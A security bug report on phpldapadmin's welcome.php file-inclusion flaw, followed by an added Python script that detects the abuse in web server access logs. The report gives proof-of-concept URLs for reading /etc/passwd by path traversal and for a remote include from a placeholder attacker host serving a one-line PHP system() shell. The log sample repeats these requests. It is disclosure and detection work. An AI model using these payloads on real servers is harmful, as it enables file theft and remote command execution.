Package: phpldapadmin
Version: 0.9.6c-6
Severity: critical
Tags: security
Justification: root security hole
If unpatched and vulnerable, a user can see any file on the target system. PoC:

http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd

A user can also execute arbitrary PHP code and system commands:

http://[target][path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif

where cmd.gif is a file like this:

<?php system('[some_command]'); ?>

Also a user can craft a malicious URL to include malicious client-side code that will be executed in the security context of the victim's browser.

Original advisory: http://www.rgod.altervista.org/phpldap.html
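Added example for detecting the two include abuses reported above in web server access logs; this is not code from the bug report or from phpldapadmin. It assumes common log format and keeps the parameter name from the report (custom_welcome_page); the log lines and IP addresses are constructed.

```python
"""Flag welcome.php requests whose custom_welcome_page value is a path
traversal (local file read) or a URL (remote file include).  Added example,
not phpldapadmin code."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2005:13:55:36 +0000] "GET /phpldapadmin/welcome.php HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2005:13:55:40 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd HTTP/1.1" 200 1879
203.0.113.5 - - [10/Oct/2005:13:55:44 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=http://203.0.113.9/cmd.gif HTTP/1.1" 200 44
203.0.113.5 - - [10/Oct/2005:13:55:50 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=custom_welcome.php HTTP/1.1" 200 600
203.0.113.5 - - [10/Oct/2005:13:55:55 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1879
"""

# Extracts the request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
SCHEME_RE = re.compile(r'^[a-zA-Z][a-zA-Z0-9+.\-]*://')


def classify_include_value(value: str) -> Optional[str]:
    """Return 'remote', 'traversal' or None for one decoded parameter value."""
    v = unquote(value)  # parse_qs decoded once; decode again for double encoding
    if SCHEME_RE.match(v) or v.startswith('//'):
        return 'remote'          # http://..., ftp://..., protocol-relative
    parts = v.replace('\\', '/').split('/')
    if '..' in parts or v.startswith('/'):
        return 'traversal'       # climbs out of, or ignores, the include directory
    return None


def scan_log(log_text: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, kind, value) for every suspicious custom_welcome_page."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)
        for value in query.get('custom_welcome_page', []):
            kind = classify_include_value(value)
            if kind:
                hits.append((n, kind, value))
    return hits


if __name__ == '__main__':
    for line_no, kind, value in scan_log(SAMPLE_LOG):
        print(f'line {line_no}: {kind}: {value}')
```

A plain relative file name such as custom_welcome.php is not flagged, so the check separates the reported abuse patterns from the parameter's ordinary use.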